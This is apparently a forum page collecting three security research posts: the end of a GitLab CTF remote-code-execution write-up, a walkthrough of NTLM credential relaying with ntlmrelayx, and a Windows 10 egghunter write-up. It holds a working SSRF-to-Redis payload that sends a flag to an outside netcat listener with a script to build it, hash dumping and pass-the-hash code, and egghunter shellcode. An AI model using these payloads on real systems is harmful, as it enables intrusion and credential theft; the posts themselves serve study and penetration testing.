- cat /flag | nc 192.168.178.21 1234 - we are reading the flag and sending it over to our netcat listener.
- An extra exec command is added so that the first one executes properly and the second one is concatenated with the next line instead of the first. This is done so that the important part of the payload won't break.

The final import URL with the payload looks like this:

# No encoding
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
 multi
 sadd resque:gitlab:queues system_hook_push
 lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|cat /flag | nc 192.168.178.21 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
 exec
 exec
/ssrf.git

# URL encoded
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20192%2E168%2E178%2E21%201234%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf.git

Now if you send the "Repo by URL" request with this URL, we get the flag!
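If you'd rather generate the encoded URL than hand-craft it, the following sketch builds the smuggled Redis commands and URL-encodes them. This is one possible way to do it, not the author's script; the listener IP is the one from this writeup, and json.dumps handles the quoting (note the hand-crafted payload above additionally backslash-escapes the single quotes):

import json
from urllib.parse import quote

# Sidekiq job handled by GitlabShellWorker (values from the writeup)
job = {
    "class": "GitlabShellWorker",
    "args": ["class_eval", "open('|cat /flag | nc 192.168.178.21 1234').read"],
    "retry": 3,
    "queue": "system_hook_push",
    "jid": "ad52abc5641173e217eb2e52",
    "created_at": 1513714403.8122594,
    "enqueued_at": 1513714403.8129568,
}

# Note the leading space on every smuggled line, and the doubled exec
lines = [
    " multi",
    " sadd resque:gitlab:queues system_hook_push",
    " lpush resque:gitlab:queue:system_hook_push "
    + json.dumps(json.dumps(job, separators=(",", ":"))),
    " exec",
    " exec",
]

# Each smuggled line is preceded by an encoded CRLF (%0D%0A)
payload = "".join("%0D%0A" + quote(line, safe="") for line in lines)
print(f"git://[0:0:0:0:0:ffff:127.0.0.1]:6379/{payload}%0D%0A/ssrf.git")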
Conclusion and Takeaways

This was a simple challenge, and after hearing about a newer version from the RPISEC team, and after seeing that one of the reported bugs was by Chaitin Tech (the organizers), it was just a matter of 2-3 hours to solve it. Do proper research before jumping to conclusions. It's all about the mindset.

Resources

- docker-compose.yml
- Video Explanation

LiveOverflow (and PwnFunction) - wannabe hacker...

Source: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
    1 point
  5. Playing with Relayed Credentials

June 27, 2018

During penetration testing exercises, the ability to make a victim connect to an attacker-controlled host provides an interesting approach for compromising systems. Such connections could be a consequence of tricking a victim into connecting to us (yes, we act as the attackers) by means of a phishing email, or by means of different techniques with the goal of redirecting traffic (e.g. ARP Poisoning, IPv6 SLAAC, etc.). In both situations, the attacker will have a connection coming from the victim that he can play with. In particular, we will cover our implementation of an attack that involves using victims' connections in a way that would allow the attacker to impersonate them against a target server of his choice - assuming the underlying authentication protocol used is NT LAN Manager (NTLM).

General NTLM Relay Concepts

The oldest implementation of this type of attack, previously called SMB Relay, goes back to 2001 by Sir Dystic of Cult of the Dead Cow - who only focused on SMB connections - although he used nice tricks, especially when launched from Windows machines where some ports are locked by the kernel. I won't go into details on how this attack works, since there is a lot of literature about it (e.g. here) and an endless number of implementations (e.g. here and here). However, it is important to highlight that this attack is not tied to a specific application layer protocol (e.g. SMB) but is in fact an issue with the NT LAN Manager Authentication Protocol (defined here). There are two flavors of this attack:

- Relay credentials to the victim machine (a.k.a. Credential Reflection): in theory, fixed by Microsoft starting with MS08-068 and then extended to other protocols. There is an interesting thread here that attempts to cover this topic.
- Relay credentials to a third-party host (a.k.a. Credential Relaying): still widely used, with no specific patch available since this is basically an authentication protocol flaw. There are effective workarounds that could help against this issue (e.g. packet signing), but only if the network protocol used supports it. There were, however, some attacks against this protection as well (e.g. CVE-2015-0005).

In a nutshell, we could abstract the attack to the NTLM protocol, regardless of the underlying application layer protocol used, as illustrated here (representing the second flavor described above).

Over the years, there were some open source solutions that extended the original SMB attack to other protocols (a.k.a. cross-protocol relaying). A few years ago, Dirk-Jan Mollema extended impacket's original smbrelayx.py implementation into a tool that could target other protocols as well. We decided to call it ntlmrelayx.py, and since then new protocols to relay against have been added:

- SMB / SMB2
- LDAP
- MS-SQL
- IMAP/IMAPs
- HTTP/HTTPs
- SMTP

I won't go into details on the specific attacks that can be done, since again, there are already excellent explanations out there (e.g. here and here). Something important to mention is that the original use case for ntlmrelayx.py was basically a one-shot attack, meaning that whenever we could catch a connection, an action (or attack) would be triggered using the successfully relayed authentication data (e.g. create a user through LDAP, download a specific HTTP page, etc.). Nevertheless, amazing attacks were implemented as part of this approach (e.g. ACL privilege escalation as explained here).
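To make the abstraction above concrete: stripped of any particular application protocol, a relay simply shuttles the three NTLM messages between two sockets. The following simplified sketch illustrates the idea; all protocol framing (SMB packets, HTTP headers, signing negotiation, etc.) is omitted, and the names are hypothetical:

import socket

def relay_ntlm(victim: socket.socket, target_host: str, target_port: int) -> socket.socket:
    """Forward the NTLM handshake from an inbound victim connection to a target."""
    target = socket.create_connection((target_host, target_port))

    negotiate = victim.recv(4096)   # NTLM Type 1 (NEGOTIATE) from the victim
    target.sendall(negotiate)       # ...replayed to the target

    challenge = target.recv(4096)   # NTLM Type 2 (CHALLENGE) from the target
    victim.sendall(challenge)       # ...handed back to the victim to solve

    auth = victim.recv(4096)        # NTLM Type 3 (AUTHENTICATE) from the victim
    target.sendall(auth)            # the target now sees a valid authentication

    return target                   # an authenticated session, minus the victim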
Also, initially, most of the attacks only worked for credentials that had administrative privileges, although over time we realized there were more possible use cases targeting regular users. These two things, along with an excellent presentation at DEF CON 20, motivated me to extend the use cases into something different.

Value every session, use it, and reuse it at will

When you're attacking networks, if you can intercept a connection or attract a victim to you, you really want to take full advantage of it, regardless of the privileges of that victim's account. The higher the better, of course, but you never know the attack paths to your objectives until you test different approaches. With all this in mind, coupled with the awesome work done on ZackAttack, it was clear that there could be an extension to ntlmrelayx.py that would strive to:

- Keep a session open as long as possible once the authentication data is successfully relayed
- Allow these sessions to be used multiple times (sometimes even concurrently)
- Relay any account, regardless of its privilege at the target system
- Relay to any possible protocol supporting NTLM, and provide a way that makes it easy to add new ones

Based on these assumptions I decided to re-architect ntlmrelayx.py to support these scenarios. The following diagram describes a high-level view of it.

We always start with a victim connecting to any of our Relay Servers, which are servers that implement support for NTLM as the authentication mechanism. At the moment, we have two Relay Servers, one for HTTP/s and another for SMB (v1 and v2+), although there could be more (e.g. RPC, LDAP, etc.). These servers know little about both the victim and the target. The most important job of these servers is to implement a specific application layer protocol (in the context of a server) and engage the victim in the NTLM authentication process. Once the victim takes the bait, the Relay Servers look for a suitable Relay Protocol Client based on the protocol we want to relay credentials to at the target machines (e.g. MSSQL). Let's say a victim connects to our HTTP Relay Server and we want to relay his credentials to the target's MSSQL service (HTTP->MSSQL). For that to happen, there has to be an MSSQL Relay Protocol Client that can establish the communication with the target and relay the credentials obtained by the Relay Server. A Relay Protocol Client plugin knows how to talk a specific protocol (e.g. MSSQL), how to engage in an NTLM authentication using relayed credentials coming from a Relay Server, and how to then keep the connection alive (more on that later). Once a relay attempt works, each instance of these Protocol Clients will hold a valid session against the target impersonating the victim's identity. We currently support Protocol Clients for HTTP/s, IMAP/s, LDAP/s, MSSQL, SMB (v1 and 2+) and SMTP, although there could be more (e.g. POP3, Exchange WS, etc.). At this stage the workflow is twofold:

- If ntlmrelayx.py is configured to run one-shot actions, the Relay Server will search for the corresponding Protocol Attack plugin that implements the static attacks offered by the tool.
- If ntlmrelayx.py is running with -socks, no action will be taken, and the authenticated sessions will be held active so they can later be used and reused through a SOCKS proxy.

SOCKS Server and SOCKS Relay plugins

Let's say we're running in -socks mode and we have a bunch of victims that took the bait.
In this case we should have a lot of sessions waiting to be used. The way we implemented the use of these sessions involves two main actors:

- SOCKS Server: a SOCKS 4/5 server that holds all the sessions and serves them to SOCKS clients. It also tries to keep these sessions up even when not in use. In order to do that, a keepAlive method on every session is called from time to time. This keepalive mechanism is bound to the particular protocol connection relayed (e.g. this is what we do for SMB).
- SOCKS Relay Plugin: when a SOCKS client connects to the SOCKS Server, there are some tricks we need to apply. Since we're holding connections that are already established (sessions), we need to trick the SOCKS client into believing an authentication is happening when, in fact, it's not. The SOCKS server also needs to know not only the target server the SOCKS client wants to connect to, but also the username, so it can verify whether or not there's an active session for it. If so, it needs to answer the SOCKS client back successfully (or not) and then tunnel the client through the session's connection. Finally, whenever the SOCKS client closes the session (which we don't really want to happen, since we want to keep these sessions active), we need to fake those calls as well. Since all these tasks are protocol specific, we've created a plugin scheme that lets contributors add more protocols that would run through SOCKS (e.g. Exchange Web Services?). We currently support tunneling connections through SOCKS for SMB, MSSQL, SMTP, IMAP/S and HTTP/S.

With all this information described, let's get into some hands-on examples.

Examples in Action

The best way to understand all of this is through examples, so let's get to playing with ntlmrelayx.py. The first thing you should do is install the latest impacket. I usually play with the dev version, but if you want to stay on the safe side, we tagged a new version a few weeks ago. Something important to keep in mind (especially for Kali users) is to be sure there is no previous impacket version installed, since sometimes the new one will get installed in a different directory and the old one will still be loaded first (check this for help). Whenever you run any of the examples, always make sure the version banner shown matches the latest version installed. Once everything is installed, the first thing to do is to run ntlmrelayx.py specifying the targets (using the -t or -tf parameters) we want to attack. Targets are now specified in URI syntax, where:

- Scheme: specifies the protocol to target (e.g. smb, mssql, all)
- Authority: in the form of domain\username@host:port (domain\username is optional and not used - yet)
- Path: optional and only used for specific attacks (e.g. HTTP, when you need to specify a base URL)

For example, if we specify the target as mssql://10.1.2.10:6969, every time we get a victim connecting to our Relay Servers, ntlmrelayx.py will relay the authentication data to the MSSQL service (port 6969) at the target 10.1.2.10. There's a special case for all://10.1.2.10. If you specify that target, ntlmrelayx.py will expand it based on the number of Protocol Client plugins available. As of today, that target will get expanded to 'smb://', 'mssql://', 'http://', 'https://', 'imap://', 'imaps://', 'ldap://', 'ldaps://' and 'smtp://', meaning that for every victim connecting to us, each credential will be relayed to those destinations (we will need a victim's connection for each destination).
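The target URIs follow standard URL syntax, so the breakdown is easy to see with Python's stdlib parser. This is illustrative only - it is not ntlmrelayx.py's actual parsing code:

from urllib.parse import urlparse

u = urlparse("mssql://10.1.2.10:6969")
print(u.scheme, u.hostname, u.port)   # mssql 10.1.2.10 6969

# The 'all://' fan-out described above, sketched by hand
PROTOCOLS = ["smb", "mssql", "http", "https", "imap", "imaps", "ldap", "ldaps", "smtp"]
target = urlparse("all://10.1.2.10")
if target.scheme == "all":
    expanded = [f"{proto}://{target.hostname}" for proto in PROTOCOLS]
    print(expanded)   # one relay destination per victim connection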
Finally, after specifying the targets, all we need is to add the -socks parameter and optionally -smb2support (so the SMB Relay Server adds support for SMB2+) and we're ready to go:

# ./ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Running in relay mode to hosts in targetfile
[*] SOCKS proxy started. Listening at port 1080
[*] IMAP Socks Plugin loaded..
[*] IMAPS Socks Plugin loaded..
[*] SMTP Socks Plugin loaded..
[*] MSSQL Socks Plugin loaded..
[*] SMB Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] HTTPS Socks Plugin loaded..
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx>

And then, with the help of Responder, phishing emails, or other tools, we wait for victims to connect. Every time authentication data is successfully relayed, you will get a message like:

[*] Authenticating against smb://192.168.48.38 as VULNERABLE\normaluser3 SUCCEED
[*] SOCKS: Adding VULNERABLE/NORMALUSER3@192.168.48.38(445) to active SOCKS connection. Enjoy

At any moment, you can get a list of active sessions by typing socks at the ntlmrelayx.py prompt:

ntlmrelayx> socks
Protocol  Target          Username                  Port
--------  --------------  ------------------------  ----
SMB       192.168.48.38   VULNERABLE/NORMALUSER3    445
MSSQL     192.168.48.230  VULNERABLE/ADMINISTRATOR  1433
MSSQL     192.168.48.230  CONTOSO/NORMALUSER1       1433
SMB       192.168.48.230  VULNERABLE/ADMINISTRATOR  445
SMB       192.168.48.230  CONTOSO/NORMALUSER1       445
SMTP      192.168.48.224  VULNERABLE/NORMALUSER3    25
SMTP      192.168.48.224  CONTOSO/NORMALUSER1       25
IMAP      192.168.48.224  CONTOSO/NORMALUSER1       143

As can be seen, there are multiple active sessions impersonating different users against different targets/services. These are some of the targets/services specified initially to ntlmrelayx.py using the -tf parameter. In order to use them, for some use cases, we will be using proxychains as our tool to redirect applications through our SOCKS proxy. When using proxychains, be sure to configure it (configuration file located at /etc/proxychains.conf) to point at the host where ntlmrelayx.py is running; the SOCKS port is the default one (1080). You should have something like this in your configuration file:

[ProxyList]
socks4 192.168.48.1 1080

Let's start with the easiest example: using some SMB sessions with Samba's smbclient. The list of available sessions for SMB is:

Protocol  Target          Username                  Port
--------  --------------  ------------------------  ----
SMB       192.168.48.38   VULNERABLE/NORMALUSER3    445
SMB       192.168.48.230  VULNERABLE/ADMINISTRATOR  445
SMB       192.168.48.230  CONTOSO/NORMALUSER1       445

Let's say we want to use the CONTOSO/NORMALUSER1 session; we could do something like this:

root@kalibeto:~# proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1
ProxyChains-3.1 (http://proxychains.sf.net)
WARNING: The "syslog" option is deprecated
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
Enter CONTOSO\normaluser1's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                    DR        0  Thu Dec  7 19:07:54 2017
  ..                   DR        0  Thu Dec  7 19:07:54 2017
  Default              DHR       0  Tue Jul 14 03:08:44 2009
  desktop.ini          AHS     174  Tue Jul 14 00:59:33 2009
  normaluser1          D         0  Wed Nov 29 14:14:50 2017
  Public               DR        0  Tue Jul 14 00:59:33 2009

		5216767 blocks of size 4096. 609944 blocks available
smb: \>

A few important things here:

- You need to specify the right domain and username pair that matches the output of the socks command. Otherwise, the session will not be recognized. For example, if you didn't specify the domain name in the smbclient parameters, you would get an output error in ntlmrelayx.py saying:

[-] SOCKS: No session for WORKGROUP/NORMALUSER1@192.168.48.230(445) available

- When you're asked for a password, just type whatever you want. As mentioned before, the SOCKS Relay Plugin that handles the connection will fake the login process and then tunnel the original connection.

Just in case, using the Administrator's session will give us a different type of access:

root@kalibeto:~# proxychains smbclient //192.168.48.230/c$ -U vulnerable/Administrator
ProxyChains-3.1 (http://proxychains.sf.net)
WARNING: The "syslog" option is deprecated
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
Enter VULNERABLE\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> dir
  $Recycle.Bin                DHS  0           Thu Dec  7 19:08:00 2017
  Documents and Settings      DHS  0           Tue Jul 14 01:08:10 2009
  pagefile.sys                AHS  1073741824  Thu May  3 16:32:43 2018
  PerfLogs                    D    0           Mon Jul 13 23:20:08 2009
  Program Files               DR   0           Fri Dec  1 17:16:28 2017
  Program Files (x86)         DR   0           Fri Dec  1 17:03:57 2017
  ProgramData                 DH   0           Tue Feb 27 15:02:13 2018
  Recovery                    DHS  0           Wed Sep 30 18:00:31 2015
  System Volume Information   DHS  0           Wed Jun  6 12:24:46 2018
  tmp                         D    0           Sun Mar 25 09:49:15 2018
  Users                       DR   0           Thu Dec  7 19:07:54 2017
  Windows                     D    0           Tue Feb 27 16:25:59 2018

		5216767 blocks of size 4096. 609996 blocks available
smb: \>

Now let's play with MSSQL. We have the following active sessions:

ntlmrelayx> socks
Protocol  Target          Username                  Port
--------  --------------  ------------------------  ----
MSSQL     192.168.48.230  VULNERABLE/ADMINISTRATOR  1433
MSSQL     192.168.48.230  CONTOSO/NORMALUSER1       1433

impacket comes with a tiny TDS client we can use for this connection:

root@kalibeto:# proxychains ./mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

Password:
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:1433-<><>-OK
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(WIN7-A\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(WIN7-A\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 19136)
[!] Press help for extra shell commands
SQL> select @@servername

--------------------------------------------------------------------------------------------------------------------------------
WIN7-A\SQLEXPRESS

SQL>

I've tested other TDS clients as well, successfully. As always, the most important thing is to correctly specify the domain/username information. Another example that is very interesting to see in action is using IMAP/s sessions with Thunderbird's native SOCKS proxy support.
Another example that is very interesting to see in action is using IMAP/s sessions with Thunderbird's native SOCKS proxy support. Based on this exercise, we have the following IMAP session active:

Protocol  Target          Username                  Port
--------  --------------  ------------------------  ----
IMAP      192.168.48.224  CONTOSO/NORMALUSER1       143

We need to configure an account in Thunderbird for this user. A few things to keep in mind when doing so:

It is important to specify the Authentication method 'Normal Password', since that's the mechanism the IMAP/s SOCKS Relay Plugin currently supports. Keep in mind, as mentioned before, this will be a fake authentication.

Under Server Settings -> Advanced you need to set the 'Maximum number of server connections to cache' to 1. This is very important, otherwise Thunderbird will try to open several connections in parallel.

Finally, under the Network Settings you will need to point the SOCKS proxy at the host where ntlmrelayx.py is running, port 1080.

Now we're ready to use that account. You can even subscribe to other folders as well. If you combine IMAP/s sessions with SMTP ones, you can fully impersonate the user's mailbox. The only constraint I've observed is that there's no way to keep an SMTP session alive; it will last for a fixed period of time that is configured through a group policy (the default is 10 minutes).

Finally, for those boxes we have administrative access on, we can just run secretsdump.py through proxychains and get the users' hashes:

root@kalibeto # proxychains ./secretsdump.py vulnerable/Administrator@192.168.48.230
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

Password:
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa6016dd8f2ac5de40e5a364848ef880c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aeb450b6b165aa734af28891f2bcd2ef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:40cb4af33bac0b739dc821583c91f009:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:ce6b7945a2ee2e8229a543ddf86d3ceb:::
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
pcadminuser2:6a8bf047b955e0945abb8026b8ce041d:VULNERABLE.CONTOSO.COM:VULNERABLE:::
Administrator:82f6813a7f95f4957a5dc202e5827826:VULNERABLE.CONTOSO.COM:VULNERABLE:::
normaluser1:b18b40534d62d6474f037893111960b9:CONTOSO.COM:CONTOSO:::
serviceaccount:dddb5f4906fd788fc41feb8d485323da:VULNERABLE.CONTOSO.COM:VULNERABLE:::
normaluser3:a24a1688c0d71b251efec801fd1e33b1:VULNERABLE.CONTOSO.COM:VULNERABLE:::
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
VULNERABLE\WIN7-A$:aad3b435b51404eeaad3b435b51404ee:ef1ccd3c502bee484cd575341e4e9a38:::
[*] DPAPI_SYSTEM
0000 01 00 00 00 1C 17 F6 05 23 2B E5 97 95 E0 E4 DF ........#+......
0010 47 96 CC 79 1A C2 6E 14 44 A3 C1 9E 6D 7C 93 F3 G..y..n.D...m|..
0020 9A EC C6 8A 49 79 20 9D B5 FB 26 79             ....Iy ...&y
DPAPI_SYSTEM:010000001c17f605232be59795e0e4df4796cc791ac26e1444a3c19e6d7c93f39aecc68a4979209db5fb2679
[*] NL$KM
0000 EB 5C 93 44 7B 08 65 27 9A D8 36 75 09 A9 CF B3 .\.D{.e'..6u....
0010 4F AF EC DF 61 63 93 E5 20 C5 4F EF 3C 65 FD 8C O...ac.. .O.<e..
[...]

From this point on, you probably don't need to use the relayed credentials anymore.
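For instance (my illustration, not from the original post), the Administrator hash dumped above can be replayed directly with impacket's SMBConnection, with no relay or proxychains in the path anymore:

from impacket.smbconnection import SMBConnection

# Pass-the-hash with the SAM entry dumped above; no password needed
conn = SMBConnection("192.168.48.230", "192.168.48.230")
conn.login("Administrator", "", domain="vulnerable",
           lmhash="aad3b435b51404eeaad3b435b51404ee",
           nthash="aeb450b6b165aa734af28891f2bcd2ef")
for share in conn.listShares():
    print(share["shi1_netname"][:-1])  # strip the trailing NUL
conn.logoff()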
Final Notes

Hopefully this blog post gives some hints on what the SOCKS support in ntlmrelayx.py is all about. There are many things to test, and surely a lot of bugs to solve (there are known stability issues). More importantly, there are still many protocols supporting NTLM that haven't been fully explored! I'd love to get your feedback and, as always, pull requests are welcome. If you have questions or comments, feel free to reach out to me at @agsolino.

Acknowledgments

Dirk-Jan Mollema (@_dirkjan) for his awesome initial work on ntlmrelayx.py and for all the modules and plugins contributed over time.

Martin Gallo (@MartinGalloAr) for peer reviewing this blog post.

Sursa: https://www.secureauth.com/blog/playing-relayed-credentials
    1 point
  7. Windows 10 egghunter (wow64) and more

Published April 23, 2019 | By Peter Van Eeckhoutte (corelanc0d3r)

Introduction

Ok, I have a confession to make: I have always been somewhat intrigued by egghunters. That doesn't mean that I like to use (or abuse) an egghunter just because I fancy what it does. In fact, I believe it's good practice to try to avoid egghunters if you can, as they tend to slow things down. What I mean is that I have been fascinated by techniques to search memory without making the process crash. It's just a personal thing, it doesn't matter too much.

What really matters is that Corelan Team is back. Well, I'm back. This is my first (technical) post in nearly 3 years, and the first post since Corelan Team kind of "faded out" before that. (In fact, I'm curious to see if (some of) the original Corelan Team members will be able to find spare time again to join forces and start doing/publishing some research. I certainly hope so, but let's see what happens.)

As some of you already know, I have recently left my day job (long story, too long for this post; glad to share details over a drink). I have launched a new company called "Corelan Consulting" and I'm trying to make a living through exploit development training and cybersecurity consulting. Trainings are going well, with 2019 almost completely filled up, and classes already being planned for 2020. You can find the training schedules here. If you're interested in setting up the Corelan Bootcamp or Corelan Advanced class at your company or at a conference, read the testimonials first and then contact me. I still need to work on my sales skills when it comes to locking in consulting gigs, but I'm sure things will work out fine in the end. (Yes, please contact me if you'd like me to work with you, I'm available for part-time governance/risk management & assessment work ;-))

Anyway, while building the 2019 edition of the Corelan Bootcamp and updating the materials for Windows 10, I realised that the wow64 egghunter for Windows 7, written by Lincoln, no longer works on Windows 10. In fact, I kind of expected it to fail, as we already knew that Microsoft keeps changing the syscall numbers with every major Windows release. And since the most commonly used egghunter mechanism is based on the use of a system call, it's clear that changing the number will break the egghunter. By the way, the system calls (and their numbers) are documented here: https://j00ru.vexillium.org/syscalls/nt/64/ (thanks Mateusz "j00ru" Jurczyk). You can find the evolution of the "NtAccessCheckAndAuditAlarm" system call number in the table on the aforementioned website.

Anyway, changing a system call number doesn't really sound all too exciting or difficult, but it also became clear that the arguments, the stack layout and the behavior of the system call in Windows 10 differ from the Windows 7 version. We found some win10 egghunter PoCs flying around, but discovered that they did not work reliably in real exploits. Lincoln looked at it for a few moments, did some debugging and produced a working version for Windows 10. So, that means we're quite proud to be able to announce a working (wow64) egghunter for Windows 10. The version below has been tested in real exploits, against real targets.
wow64 egghunter for Windows 10

As explained, the challenge was to figure out where & how the new system call expects its arguments, and how it changes registers & the stack, so that the arguments are always in the right place and the routine provides the intended functionality: to test if a given page is accessible or not, and to do so without making the process die. This is what the updated routine looks like:

"\x33\xD2"              #XOR EDX,EDX
"\x66\x81\xCA\xFF\x0F"  #OR DX,0FFF
"\x33\xDB"              #XOR EBX,EBX
"\x42"                  #INC EDX
"\x52"                  #PUSH EDX
"\x53"                  #PUSH EBX
"\x53"                  #PUSH EBX
"\x53"                  #PUSH EBX
"\x53"                  #PUSH EBX
"\x6A\x29"              #PUSH 29 (system call 0x29)
"\x58"                  #POP EAX
"\xB3\xC0"              #MOV BL,0C0
"\x64\xFF\x13"          #CALL DWORD PTR FS:[EBX] (perform the system call)
"\x83\xC4\x10"          #ADD ESP,0x10
"\x5A"                  #POP EDX
"\x3C\x05"              #CMP AL,5
"\x74\xE3"              #JE SHORT
"\xB8\x77\x30\x30\x74"  #MOV EAX,74303077 (the egg: "w00t")
"\x8B\xFA"              #MOV EDI,EDX
"\xAF"                  #SCAS DWORD PTR ES:[EDI]
"\x75\xDE"              #JNZ SHORT
"\xAF"                  #SCAS DWORD PTR ES:[EDI]
"\x75\xDB"              #JNZ SHORT
"\xFF\xE7"              #JMP EDI

This egghunter works great on Windows 10, but it assumes you're running inside the wow64 environment (a 32bit process on a 64bit OS). Of course, as Lincoln has explained in his blogpost, you can simply add a check to determine the architecture and make the egghunter work on a native 32bit OS as well.

You can generate this egghunter with mona.py too; simply run:

!mona egg -wow64 -winver 10

When debugging this egghunter (or any wow64 egghunter that is using system calls), you'll notice access violations during the execution of the system call. These access violations can be safely passed through and will be handled by the OS... but the debugger will break every time it sees an access violation. (In essence, the debugger will break as soon as the code attempts to test a page that is not readable. In other words, you'll get an awful lot of access violations, requiring your manual intervention.) If you're using Immunity Debugger, you can simply tell the debugger to ignore the access violations. To do so, click on 'debugging options', and open the 'exceptions' tab. Add the following hex values under "Add range":

0xC0000005 – ACCESS VIOLATION
0x80000001 – STATUS_GUARD_PAGE_VIOLATION

Of course, when you have finished debugging the egghunter, don't forget to remove these 2 exceptions again.
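As a quick aside (a sketch of mine, not from the original article), this is how the hunter and payload typically end up laid out in an exploit: the 4-byte tag must appear twice, back to back, directly in front of the real shellcode, because the hunter verifies the egg with two consecutive SCAS instructions and then JMP EDIs to the byte right behind the second tag:

# The Windows 10 wow64 egghunter, byte-for-byte as listed above
egghunter = ("\x33\xd2\x66\x81\xca\xff\x0f\x33\xdb\x42"
             "\x52\x53\x53\x53\x53\x6a\x29\x58\xb3\xc0"
             "\x64\xff\x13\x83\xc4\x10\x5a\x3c\x05\x74"
             "\xe3\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75"
             "\xde\xaf\x75\xdb\xff\xe7")

tag = "w00t"
shellcode = "\xcc" * 200        # placeholder payload (INT3s), for illustration only

stage1 = egghunter              # goes where space is tight (e.g. the buffer EIP lands in)
stage2 = tag + tag + shellcode  # can live anywhere readable in the process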
Going forward

For sure, MS is entitled to change whatever they want in their Operating System. I don't think developers are supposed to issue system calls themselves; I believe they should be using the wrapper functions in ntdll.dll instead. In other words, it should be "safe" for MS to change system call numbers. I don't know what is behind the system call number increment with every Windows version, and I don't know if the system call numbers are going to remain the same forever, now that Windows 10 has been labeled as the "last Windows version". From an egghunter perspective that would be great: as an increasingly larger group of people adopts Windows 10, the egghunter will have an increasingly larger success ratio as well. But in reality I don't know if that is a valid assumption to make or not.

In any case, it made me think: would there be a way to make an egghunter work using a different technique, without the use of system calls? And if so, would that technique also work on older versions of Windows? And if we're not using system calls, would it work on native x86 and wow64 environments right away? Let's see.

Exception Handling

The original paper on egghunters ("Safely Searching Process Virtual Address Space"), written by skape (2004!), already introduced the use of custom exception handlers to handle the access violation that will occur if you're trying to read from a page that is not accessible. By making the handler point back into the egghunter, the egghunter would be able to move on. The original implementation, unfortunately, no longer seems to work. While doing some testing (many years ago, as well as just recently on Windows 10), it looks like the OS doesn't really allow you to make the exception handler point directly to the stack (I haven't tried the heap, but I expect the same restriction to be in place). In other words, if the egghunter runs from the stack or heap, you wouldn't be able to make the egghunter use itself as exception handler and move on.

Before looking at a possible solution, let's remind ourselves of how the exception handling mechanism works. When the OS sees an exception and decides to pass it to the corresponding thread in the process, it will instruct a function in ntdll.dll to launch the Exception Handling mechanism within that thread. This routine will check the TEB at offset 0 (accessible via FS:[0]) and will retrieve the address of the topmost record in the exception handling chain on the stack. Each record consists of 2 fields:

struct EXCEPTION_REGISTRATION
{
   EXCEPTION_REGISTRATION *nextrecord;  // pointer to next record (nseh)
   DWORD handler;                       // pointer to handler function
};

The topmost record contains the address of the routine that will be called first, in order to check if the application can handle the exception or not. If that routine fails, the next record in the chain will be tried (either until one of the routines is able to handle the exception, or until the default handler is used, sending the process to heaven). So, in other words, the routine in ntdll.dll will find the record and will call the "handler" address (i.e. whatever is placed in the second field of the record).

So, translating this into the egghunter world: if we want to maintain control over what happens when an exception occurs, we'll have to create a custom "topmost" SEH record, making sure it is the topmost record at all times during the execution of the egghunter, and we'll have to make the record handler point into a routine that allows our egghunter to continue running and move on with the next page. Again, if our "custom" record is the topmost record, we'll be sure that it will be the first one to be used.

